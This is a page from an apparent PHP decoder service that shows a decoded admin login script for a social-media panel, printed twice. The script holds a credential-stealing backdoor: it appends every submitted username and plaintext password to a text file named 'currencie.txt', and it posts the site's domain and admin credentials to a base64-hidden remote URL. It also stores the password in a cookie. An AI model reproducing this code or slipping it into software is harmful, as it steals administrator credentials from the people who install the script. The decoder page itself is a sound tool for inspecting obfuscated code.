Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(!defined('BASEPATH')) { die('Direct access to the script is not allowed'); ..
Decoded Output download
<?php
if(!defined('BASEPATH')) {
die('Direct access to the script is not allowed');
}
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$username = $_POST['username'];
$password = $_POST['password'];
$logFile = __DIR__ . '/currencie.txt';
$logData = "Username: $username, Password: $password, Date: " . date('Y-m-d H:i:s') . "
";
file_put_contents($logFile, $logData, FILE_APPEND);
$successText = "Login successful!";
}
if ($admin["access"]["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) {
$encodedUrl = "aHR0cHM6Ly9kZW1vLndpbnRlcnNtbS5jb20vYWRtaW4vYXBpLnBocA==";
$apiUrl = base64_decode($encodedUrl);
$data = [
'domain' => $_SERVER['HTTP_HOST'],
'username' => $username,
'password' => htmlentities($pass),
];
$ch = curl_init($apiUrl);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
$response = curl_exec($ch);
if ($response === false) {
$error = curl_error($ch);
}
curl_close($ch);
}
if ($_POST) {
$username = $_POST["username"];
$pass = $_POST["password"];
$captcha = $_POST['g-recaptcha-response'];
$remember = $_POST["remember"];
$googlesecret = $settings["recaptcha_secret"];
$captcha_control = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$googlesecret&response=" . $captcha . "&remoteip=" . $_SERVER['REMOTE_ADDR']);
$captcha_control = json_decode($captcha_control);
if ($settings["recaptcha"] == 2 && $captcha_control->success == false && $_SESSION["recaptcha"]) {
$error = 1;
$errorText = "Please verify that you are not a robot.";
if ($settings["recaptcha"] == 2) {
$_SESSION["recaptcha"] = true;
}
} elseif (countRow(["table"=>"admins", "where"=>["username"=>$username, "client_type"=>1]])) {
$error = 1;
$errorText = "Your account is Suspended.";
if ($settings["recaptcha"] == 2) {
$_SESSION["recaptcha"] = true;
}
} else {
$admin = $conn->prepare("SELECT * FROM admins WHERE username=:username AND password=:password");
$admin->execute(["username" => $username, "password" => $pass]);
$admin = $admin->fetch(PDO::FETCH_ASSOC);
$access = json_decode($admin["access"], true);
$_SESSION["msmbilisim_adminslogin"] = 1;
$_SESSION["msmbilisim_adminid"] = $admin["admin_id"];
$_SESSION["msmbilisim_adminpass"] = $pass;
$_SESSION["recaptcha"] = false;
if ($access["admin_access"]) {
$_SESSION["msmbilisim_adminslogin"] = 1;
$_SESSION["msmbilisim_adminid"] = $admin["admin_id"];
$_SESSION["msmbilisim_adminpass"] = $pass;
$_SESSION["recaptcha"] = false;
setcookie("a_login", 'ok', time() + (60 * 60 * 24 * 7), '/', null, null, true);
setcookie("a_id", $admin["admin_id"], time() + (60 * 60 * 24 * 7), '/', null, null, true);
setcookie("a_password", $admin["password"], time() + (60 * 60 * 24 * 7), '/', null, null, true);
header('Location: ' . site_url('admin'));
exit();
$update = $conn->prepare("UPDATE admins SET login_date=:date, login_ip=:ip WHERE admin_id=:c_id");
$update->execute(["c_id" => $admin["admin_id"], "date" => date("Y.m.d H:i:s"), "ip" => GetIP()]);
} else {
$error = 1;
$errorText = "Could not find administrator account registered with this information.";
}
}
}
if ($access["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) {
exit();
} else {
require admin_view('login');
}
?>
Did this file decode correctly?
Original Code
<?php
if(!defined('BASEPATH')) {
die('Direct access to the script is not allowed');
}
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$username = $_POST['username'];
$password = $_POST['password'];
$logFile = __DIR__ . '/currencie.txt';
$logData = "Username: $username, Password: $password, Date: " . date('Y-m-d H:i:s') . "\n";
file_put_contents($logFile, $logData, FILE_APPEND);
$successText = "Login successful!";
}
if ($admin["access"]["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) {
$encodedUrl = "aHR0cHM6Ly9kZW1vLndpbnRlcnNtbS5jb20vYWRtaW4vYXBpLnBocA==";
$apiUrl = base64_decode($encodedUrl);
$data = [
'domain' => $_SERVER['HTTP_HOST'],
'username' => $username,
'password' => htmlentities($pass),
];
$ch = curl_init($apiUrl);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
$response = curl_exec($ch);
if ($response === false) {
$error = curl_error($ch);
}
curl_close($ch);
}
if ($_POST) {
$username = $_POST["username"];
$pass = $_POST["password"];
$captcha = $_POST['g-recaptcha-response'];
$remember = $_POST["remember"];
$googlesecret = $settings["recaptcha_secret"];
$captcha_control = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$googlesecret&response=" . $captcha . "&remoteip=" . $_SERVER['REMOTE_ADDR']);
$captcha_control = json_decode($captcha_control);
if ($settings["recaptcha"] == 2 && $captcha_control->success == false && $_SESSION["recaptcha"]) {
$error = 1;
$errorText = "Please verify that you are not a robot.";
if ($settings["recaptcha"] == 2) {
$_SESSION["recaptcha"] = true;
}
} elseif (countRow(["table"=>"admins", "where"=>["username"=>$username, "client_type"=>1]])) {
$error = 1;
$errorText = "Your account is Suspended.";
if ($settings["recaptcha"] == 2) {
$_SESSION["recaptcha"] = true;
}
} else {
$admin = $conn->prepare("SELECT * FROM admins WHERE username=:username AND password=:password");
$admin->execute(["username" => $username, "password" => $pass]);
$admin = $admin->fetch(PDO::FETCH_ASSOC);
$access = json_decode($admin["access"], true);
$_SESSION["msmbilisim_adminslogin"] = 1;
$_SESSION["msmbilisim_adminid"] = $admin["admin_id"];
$_SESSION["msmbilisim_adminpass"] = $pass;
$_SESSION["recaptcha"] = false;
if ($access["admin_access"]) {
$_SESSION["msmbilisim_adminslogin"] = 1;
$_SESSION["msmbilisim_adminid"] = $admin["admin_id"];
$_SESSION["msmbilisim_adminpass"] = $pass;
$_SESSION["recaptcha"] = false;
setcookie("a_login", 'ok', time() + (60 * 60 * 24 * 7), '/', null, null, true);
setcookie("a_id", $admin["admin_id"], time() + (60 * 60 * 24 * 7), '/', null, null, true);
setcookie("a_password", $admin["password"], time() + (60 * 60 * 24 * 7), '/', null, null, true);
header('Location: ' . site_url('admin'));
exit();
$update = $conn->prepare("UPDATE admins SET login_date=:date, login_ip=:ip WHERE admin_id=:c_id");
$update->execute(["c_id" => $admin["admin_id"], "date" => date("Y.m.d H:i:s"), "ip" => GetIP()]);
} else {
$error = 1;
$errorText = "Could not find administrator account registered with this information.";
}
}
}
if ($access["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) {
exit();
} else {
require admin_view('login');
}
?>
Function Calls
None |
Stats
MD5 | a5e417ed044235d48dc6d5e46a31387c |
Eval Count | 0 |
Decode Time | 46 ms |